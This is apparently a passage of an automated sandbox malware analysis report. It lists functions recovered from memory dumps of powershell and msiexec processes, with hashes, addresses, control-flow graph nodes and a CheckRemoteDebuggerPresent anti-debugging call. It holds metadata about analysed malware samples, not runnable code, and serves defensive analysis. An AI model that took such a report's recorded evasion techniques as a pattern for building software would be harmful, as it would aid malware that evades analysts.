                                                        • Instruction Fuzzy Hash: 3C314A30B011688FCF25DB64C8946EEB7B2BF49305F1444E9D509AB351CB36AE81DF80
                                                        Function 072F0DFC Relevance: .1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 835a39e39fae5ab892d6529ad76f1a317030db84187fbf5d06868c4406e268d6
                                                        • Instruction ID: 7ac6c8eb37632d542bc10443649652516473825ecc17b3cb7d694290163cb21b
                                                        • Opcode Fuzzy Hash: 835a39e39fae5ab892d6529ad76f1a317030db84187fbf5d06868c4406e268d6
                                                        • Instruction Fuzzy Hash: EF21BEB13183CA6BD7304A76884073BBFA69F86304F28447BD641DB2C3CA75D944C360
                                                        Function 044E4679 Relevance: .1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05a07c3186eccc47aabfbf40f344d9ce2fdb7e3c2f7983a3f6031cee67144460
                                                        • Instruction ID: 08be09289a31c0791c657a8c03b016fa922818fb87d92de6c5c298513d37bf61
                                                        • Opcode Fuzzy Hash: 05a07c3186eccc47aabfbf40f344d9ce2fdb7e3c2f7983a3f6031cee67144460
                                                        • Instruction Fuzzy Hash: C021F474A006099FCB04CF59C9849AAFBB1FF49310B2485A9E909EB761C735EC51CBA0
                                                        Function 044E4688 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 08c7529638b8ecb4d3c7da96433ecfc335523e0e027e5ae515947c43dc59e298
                                                        • Instruction ID: 31cc49d5fb4395b3659b04b5e0aa5e76cff520c931c7664c0c1129c37ed09cd8
                                                        • Opcode Fuzzy Hash: 08c7529638b8ecb4d3c7da96433ecfc335523e0e027e5ae515947c43dc59e298
                                                        • Instruction Fuzzy Hash: 89211578A00209DFCB04CF99C6849AAFBB1FF4D310B2485A9E909A7761C731FC51CBA1
                                                        Function 072F0C08 Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e29254987ff8eb67175126779d6bf74ae1f2f5862d26a6640c834a962adf0ee
                                                        • Instruction ID: 5612518f4d81ad1882d58ef653057f050d67a8b46cb7c0423a87005f9a25f9d4
                                                        • Opcode Fuzzy Hash: 0e29254987ff8eb67175126779d6bf74ae1f2f5862d26a6640c834a962adf0ee
                                                        • Instruction Fuzzy Hash: 1601F77A32031B8FC7745DAA940057BF79ADBC5622F14C43FD649C7252D672C845C760
                                                        Function 044EEE5B Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2461126179.00000000044E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_44e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc379d7670c5a07ae512c85bd705d835c844484415ed9126e592a5901d891778
                                                        • Instruction ID: fe2f0fc628f76f710879bc393ab39d11a12ea35eb1350904c74e7a4d51e523b0
                                                        • Opcode Fuzzy Hash: dc379d7670c5a07ae512c85bd705d835c844484415ed9126e592a5901d891778
                                                        • Instruction Fuzzy Hash: 6B116030D00158DBEF34DAAAD5987BDB7B1EB1531BF24146BC011B62A0EB766889CB16
                                                        Function 00ECD005 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2460269826.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_ecd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5d066a67c1610520d34b0c8ca11ed54757f0ec79a3cf44624fc5b62730ec1f9
                                                        • Instruction ID: 840ff3d6b2ac8aa28ac5862c64e70fb0d1505060ad52474849bfff629dba1be6
                                                        • Opcode Fuzzy Hash: e5d066a67c1610520d34b0c8ca11ed54757f0ec79a3cf44624fc5b62730ec1f9
                                                        • Instruction Fuzzy Hash: 7501406100E3C09ED7128B258D94B52BFB4EF53224F1D85DBD9889F1A3C26A5849C772
                                                        Function 00ECD01D Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2460269826.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_ecd000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5fbea64673e3d2b624bfa7cfbea55fecec47cd76e629cbbd9a496a0ae62a509b
                                                        • Instruction ID: 081f0f454f8665066990c9d04d2435f9182a33c684daed7039308a5f33918da0
                                                        • Opcode Fuzzy Hash: 5fbea64673e3d2b624bfa7cfbea55fecec47cd76e629cbbd9a496a0ae62a509b
                                                        • Instruction Fuzzy Hash: 9801F7310083409AD7208A1DCE85F67BF98EF45324F18C43DED485A246C27B9843C6B1

                                                        Non-executed Functions

                                                        Function 072F2310 Relevance: 12.8, Strings: 10, Instructions: 307COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                        • API String ID: 0-2815571254
                                                        • Opcode ID: ce2c6436a8b7e7449c077677121f7d28c7316cb88117fbfe7455a18e552856e4
                                                        • Instruction ID: 3f9c1f30ad22abe81b1820527d0ad3004ef65fb21ed2529e1fb213716dbe6d59
                                                        • Opcode Fuzzy Hash: ce2c6436a8b7e7449c077677121f7d28c7316cb88117fbfe7455a18e552856e4
                                                        • Instruction Fuzzy Hash: 0BA157B1724317CFCB299A29D86066EFBE6FF87210F14807ADA01DB291DA75C841C7A1
                                                        Function 072F1C80 Relevance: 10.4, Strings: 8, Instructions: 400COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$t~}q$$jq$$jq$$jq
                                                        • API String ID: 0-1981346748
                                                        • Opcode ID: fa8abc878911af2055c8784b75b4aade471103eabbab0f89eeb2facd49e4b452
                                                        • Instruction ID: 37fbee6e7d353c80521774e3505836656715fc91b29c28405afd2ded48d6457c
                                                        • Opcode Fuzzy Hash: fa8abc878911af2055c8784b75b4aade471103eabbab0f89eeb2facd49e4b452
                                                        • Instruction Fuzzy Hash: 53C158B1B2020ACFCB249A6998106AFFBE6FFC5210F54807FD605DB251DB31C955C7A1
                                                        Function 072F9A30 Relevance: 9.2, Strings: 7, Instructions: 478COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq
                                                        • API String ID: 0-2919996211
                                                        • Opcode ID: 7f74b51ae419c36273b58fd8cd681dc173de0b81508b472b78f18a9ef09eea45
                                                        • Instruction ID: a4986a3f3550263b10da9fcdabef1e33d06de77510eb591dbd79761bca84a465
                                                        • Opcode Fuzzy Hash: 7f74b51ae419c36273b58fd8cd681dc173de0b81508b472b78f18a9ef09eea45
                                                        • Instruction Fuzzy Hash: 66F16AB17242068FC7249B68C4117AAFBE6EFC5310F14847BDA85DB251DB32ED85CBA1
                                                        Function 072FD204 Relevance: 8.9, Strings: 7, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$TQoq$TQoq$tPjq$$jq$$jq$$jq
                                                        • API String ID: 0-2666386787
                                                        • Opcode ID: f9382d0cad62396a03f4184a43a1abd116b255aa60376825fe97e3dddd380217
                                                        • Instruction ID: ecdf3ec3e8a9d399afc9003a8c169056a014554ffb1036aac9592cdeae7bfb11
                                                        • Opcode Fuzzy Hash: f9382d0cad62396a03f4184a43a1abd116b255aa60376825fe97e3dddd380217
                                                        • Instruction Fuzzy Hash: F851CFB0730207DFDB24DF14C564BAAF7A2AF41315F5884B6EA019B291C775ED84CBA1
                                                        Function 072FD218 Relevance: 8.9, Strings: 7, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$TQoq$TQoq$tPjq$$jq$$jq$$jq
                                                        • API String ID: 0-2666386787
                                                        • Opcode ID: 0bca0ab1bcca6bea623d4e2f9fee0e52c1c4af14fca09d87a128c5c08d0b1893
                                                        • Instruction ID: 60b175a71d7747524eed686f5f5f1e52dedee2e247732cb45eb4fb2bf1659c87
                                                        • Opcode Fuzzy Hash: 0bca0ab1bcca6bea623d4e2f9fee0e52c1c4af14fca09d87a128c5c08d0b1893
                                                        • Instruction Fuzzy Hash: 9A51C0B0730207DFDB24DF04C664BAAF7A2BB45315F5484B6EA059B291C7B5ED80CBA1
                                                        Function 072F12C8 Relevance: 8.0, Strings: 6, Instructions: 488COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq
                                                        • API String ID: 0-3227924995
                                                        • Opcode ID: 6609579823d83e60cd825590b56f1aab9ebe6601632d879cf94aa43c60c0dcac
                                                        • Instruction ID: 6e7cb175f3984d0dd7e86f18f1d6c8889d3038f7c7e94ad4b8f29ce80f778490
                                                        • Opcode Fuzzy Hash: 6609579823d83e60cd825590b56f1aab9ebe6601632d879cf94aa43c60c0dcac
                                                        • Instruction Fuzzy Hash: D0128EB4B20209DFD714CB58C540AAAFBB2FF89704F54C169E905AB355CB72ED41CB91
                                                        Function 072FC2C8 Relevance: 7.7, Strings: 6, Instructions: 211COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$$jq$$jq$$jq$$jq
                                                        • API String ID: 0-210473685
                                                        • Opcode ID: db747a5230cb2fae72faae386f848414cb4d4e6bbb47f33e913bd3365de5b16f
                                                        • Instruction ID: dd54bb2ece6b6ccd3c9b70b7b6556bf12d02f0df0af6cfd08a91ccd390e7e347
                                                        • Opcode Fuzzy Hash: db747a5230cb2fae72faae386f848414cb4d4e6bbb47f33e913bd3365de5b16f
                                                        • Instruction Fuzzy Hash: BC6124B172420E8FCB149E69D4002BAFBA6EF86261F24C47ADA05CB251DB71CD81C7B1
                                                        Function 072FCCE5 Relevance: 7.7, Strings: 6, Instructions: 154COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$d%pq$d%pq$d%pq$tPjq$$jq
                                                        • API String ID: 0-570316927
                                                        • Opcode ID: 7401315429f4b458717ca9a4343911a8361e259a206058d7eff8da598a045e12
                                                        • Instruction ID: 80ab410f346f9719218078bc6efcf3d706ee62078183b5de758ef388bd73d5b4
                                                        • Opcode Fuzzy Hash: 7401315429f4b458717ca9a4343911a8361e259a206058d7eff8da598a045e12
                                                        • Instruction Fuzzy Hash: 2451B1B1A3020BDFCB28CE14C550BAAFBA2AF44750F148576EA059B290D771DDC0CBB1
                                                        Function 072FDC20 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$tPjq$$jq$$jq$$jq
                                                        • API String ID: 0-728028659
                                                        • Opcode ID: 97f486a10cb04bc34465a430f1e6da6c17fdb028e3d765ad6bb33e16131a16b2
                                                        • Instruction ID: 2eae950c34b9f8368392b0b9b24ba19e316e83ca81fd96b7d12e743049bb3b1a
                                                        • Opcode Fuzzy Hash: 97f486a10cb04bc34465a430f1e6da6c17fdb028e3d765ad6bb33e16131a16b2
                                                        • Instruction Fuzzy Hash: 4961B0F173020BDFDB28CE15C564BBAF7A2AB45311F54857AEA019B294C7B5DC80CBA1
                                                        Function 072F4105 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                        • API String ID: 0-103809679
                                                        • Opcode ID: 0abaa647bcae0da3eb67e228804d9f78d79b1675a7c6ae89478ffc59fc88923e
                                                        • Instruction ID: a619eb9fbf3c08e9d7f49f55044500bcb30ed4edf3cac8abe148ef5ddab13381
                                                        • Opcode Fuzzy Hash: 0abaa647bcae0da3eb67e228804d9f78d79b1675a7c6ae89478ffc59fc88923e
                                                        • Instruction Fuzzy Hash: 923187B2724797CFEB256E649C101B7F7A6EFD2211B38807FCA018B291DAB1C942C751
                                                        Function 072F8668 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$tPjq$$jq$$jq$$jq
                                                        • API String ID: 0-728028659
                                                        • Opcode ID: e12b20bb23bcaf86a365f486892d52203170bb0a94514931b82ecbdf39a6cfdb
                                                        • Instruction ID: 9760361572a6849717fc6ee195ada1f45dbfd00160c4d6dc924b2c845d8fa8fa
                                                        • Opcode Fuzzy Hash: e12b20bb23bcaf86a365f486892d52203170bb0a94514931b82ecbdf39a6cfdb
                                                        • Instruction Fuzzy Hash: 8631D3B5A3020BDFDB24CE45C544BA6F7A2AF45320F18C17ADA156B290DB75DC80CF91
                                                        Function 072FCE16 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$d%pq$d%pq$d%pq$tPjq
                                                        • API String ID: 0-3681948632
                                                        • Opcode ID: b2bcd8422ed3a7c9704a1d333eb83570f41f02561745ea296a14a7cf6976b8b5
                                                        • Instruction ID: bbb3f0d2057ce07b8da7c6b32b1d04f91463cde2c3147ee80e6ca7002fcd5e27
                                                        • Opcode Fuzzy Hash: b2bcd8422ed3a7c9704a1d333eb83570f41f02561745ea296a14a7cf6976b8b5
                                                        • Instruction Fuzzy Hash: 8831C7B1B6021ADFCB24CF58C454A59FBA2FF88710F148266EA05AB350C771DC81CBA5
                                                        Function 072FE860 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'jq$4'jq$f$f
                                                        • API String ID: 0-967782640
                                                        • Opcode ID: 59e3c3a34717b9ead21114fa8bb5753990171f216343230f8a760b1e8dbff4f0
                                                        • Instruction ID: 5d2f0e02f3e0578f02055d29b0d551c71c5f056a9d39ec5dd7c9d79185229b78
                                                        • Opcode Fuzzy Hash: 59e3c3a34717b9ead21114fa8bb5753990171f216343230f8a760b1e8dbff4f0
                                                        • Instruction Fuzzy Hash: EB61A1B0F202069FC725DB58C551A6AFBE3BF88710F158479DA05AB364CB36DC41CBA2
                                                        Function 072FE020 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XRoq$XRoq$tPjq$$jq
                                                        • API String ID: 0-3567977740
                                                        • Opcode ID: c6a464dc9b5c74603729fce14a6ad6c6fb8963cedfa52248beb924cf7c3cc36a
                                                        • Instruction ID: a1e1027788d614e2a64be421961e8a5b987e167ff826b0df0889e37a4e615c8a
                                                        • Opcode Fuzzy Hash: c6a464dc9b5c74603729fce14a6ad6c6fb8963cedfa52248beb924cf7c3cc36a
                                                        • Instruction Fuzzy Hash: 7D418DB0E20206DBDB268E59C544AAAF7F2EF85710F1AC0B9EA056B261C771DD40CB91
                                                        Function 072F1070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2487757039.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_72f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $jq$$jq$$jq$$jq
                                                        • API String ID: 0-2428501249
                                                        • Opcode ID: 0c578b5b1b6eb9711e9316dc858873f173dec74c737c9547c9357000d14fc284
                                                        • Instruction ID: c738fa2c4be3d6348420a837107803c8d98efa615be0980f1ac100b713709a1a
                                                        • Opcode Fuzzy Hash: 0c578b5b1b6eb9711e9316dc858873f173dec74c737c9547c9357000d14fc284
                                                        • Instruction Fuzzy Hash: 2C2143B133024BDFDB2855AA8810767F69AEBC1615FA0843EAA05CB385DDB6C851C360

                                                        Execution Graph

                                                        Execution Coverage:6.1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:100%
                                                        Total number of Nodes:3
                                                        Total number of Limit Nodes:0
                                                        execution_graph 27039 2fd7ed8 27040 2fd7efc CheckRemoteDebuggerPresent 27039->27040 27042 2fd7f5e 27040->27042

                                                        Executed Functions

                                                        Function 27666658 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 27666658-27666679 1 2766667b-2766667e 0->1 2 276666a4-276666a7 1->2 3 27666680-2766669f 1->3 4 276666ad-276666cc 2->4 5 27666e48-27666e4a 2->5 3->2 13 276666e5-276666ef 4->13 14 276666ce-276666d1 4->14 6 27666e51-27666e54 5->6 7 27666e4c 5->7 6->1 10 27666e5a-27666e63 6->10 7->6 18 276666f5-27666704 13->18 14->13 15 276666d3-276666e3 14->15 15->18 126 27666706 call 27666e71 18->126 127 27666706 call 27666e78 18->127 19 2766670b-27666710 20 27666712-27666718 19->20 21 2766671d-276669fa 19->21 20->10 42 27666a00-27666aaf 21->42 43 27666e3a-27666e47 21->43 52 27666ab1-27666ad6 42->52 53 27666ad8 42->53 54 27666ae1-27666af4 52->54 53->54 57 27666e21-27666e2d 54->57 58 27666afa-27666b1c 54->58 57->42 59 27666e33 57->59 58->57 61 27666b22-27666b2c 58->61 59->43 61->57 62 27666b32-27666b3d 61->62 62->57 63 27666b43-27666c19 62->63 75 27666c27-27666c57 63->75 76 27666c1b-27666c1d 63->76 80 27666c65-27666c71 75->80 81 27666c59-27666c5b 75->81 76->75 82 27666c73-27666c77 80->82 83 27666cd1-27666cd5 80->83 81->80 82->83 86 27666c79-27666ca3 82->86 84 27666e12-27666e1b 83->84 85 27666cdb-27666d17 83->85 84->57 84->63 96 27666d25-27666d33 85->96 97 27666d19-27666d1b 85->97 93 27666ca5-27666ca7 86->93 94 27666cb1-27666cce 86->94 93->94 94->83 100 27666d35-27666d40 96->100 101 27666d4a-27666d55 96->101 97->96 100->101 104 27666d42 100->104 105 27666d57-27666d5d 101->105 106 27666d6d-27666d7e 101->106 104->101 107 27666d61-27666d63 105->107 108 27666d5f 105->108 110 27666d96-27666da2 106->110 111 27666d80-27666d86 106->111 107->106 108->106 115 27666da4-27666daa 110->115 116 27666dba-27666e0b 110->116 112 27666d8a-27666d8c 111->112 113 27666d88 111->113 112->110 113->110 117 27666dae-27666db0 115->117 118 27666dac 115->118 116->84 117->116 118->116 126->19 127->19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                        • API String ID: 0-3356825164
                                                        • Opcode ID: e9724a4f97ea84b0ff33ccba13c0973714e17530634052d31211acf3f538715a
                                                        • Instruction ID: 229c5a544aae5f6eb2042e44da657ebf4064e6ea305e75a0640a943a882202d9
                                                        • Opcode Fuzzy Hash: e9724a4f97ea84b0ff33ccba13c0973714e17530634052d31211acf3f538715a
                                                        • Instruction Fuzzy Hash: C7325E30A10619CFCB14DF74C89499DB7B6FF89300F6086AAD50AA7224EF74AE81CB51
                                                        Function 02FD7ED8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 396 2fd7ed8-2fd7f5c CheckRemoteDebuggerPresent 399 2fd7f5e-2fd7f64 396->399 400 2fd7f65-2fd7fa0 396->400 399->400
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02FD7F4F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3340802205.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2fd0000_msiexec.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID: UcTu
                                                        • API String ID: 3662101638-1774077974
                                                        • Opcode ID: e99657894867239da2ff2a43eda93640c5fb8f08e209d90aa7079c3a1fbdd514
                                                        • Instruction ID: 4a2cd3bdbf8b4ccc40038950bc7eb85d4808751cf91fa2355916802957398060
                                                        • Opcode Fuzzy Hash: e99657894867239da2ff2a43eda93640c5fb8f08e209d90aa7079c3a1fbdd514
                                                        • Instruction Fuzzy Hash: 852137B19002598FCB10DFAAD484BEEFBF4EF49320F14845AE859A7350D778A944CFA1
                                                        Function 2766597A Relevance: 1.0, Instructions: 1001COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4dd6419ec051bdbb528b0da8530377fd27ece8c62e61a7ddf8d8be8c47debd7b
                                                        • Instruction ID: a37ec2dba2793b68d96ae279942e2686b13fb67764dd4932c202a5cc9ec75cd1
                                                        • Opcode Fuzzy Hash: 4dd6419ec051bdbb528b0da8530377fd27ece8c62e61a7ddf8d8be8c47debd7b
                                                        • Instruction Fuzzy Hash: F9923634A00214CFDB14DF68C588A5DBBF2EF45314F9488A9D50AAB366DB79ED85CF80
                                                        Function 2766E7F0 Relevance: .6, Instructions: 568COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d82cf8895609e6312414bccfd1c87edadedc97814c0db94cdf618ec5dfb5c34
                                                        • Instruction ID: d3dff2f30ca2053ef6a0199ab2e1da4fa5b44ebf75570cb53d5522984d6dc0b5
                                                        • Opcode Fuzzy Hash: 8d82cf8895609e6312414bccfd1c87edadedc97814c0db94cdf618ec5dfb5c34
                                                        • Instruction Fuzzy Hash: 48224E70E00209CFEB14CBA8D588B9DBBB6FF45310FA48526E415DB3A6DA38DD85CB51
                                                        Function 02FD7ED2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 388 2fd7ed2-2fd7ed5 389 2fd7efc-2fd7f5c CheckRemoteDebuggerPresent 388->389 390 2fd7ed8-2fd7ef9 388->390 392 2fd7f5e-2fd7f64 389->392 393 2fd7f65-2fd7fa0 389->393 390->389 392->393
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02FD7F4F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3340802205.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2fd0000_msiexec.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID: UcTu
                                                        • API String ID: 3662101638-1774077974
                                                        • Opcode ID: 1a90e965bc6fe01ca399c6391ff547445303b14f5d031985d8ddcde19be83ad2
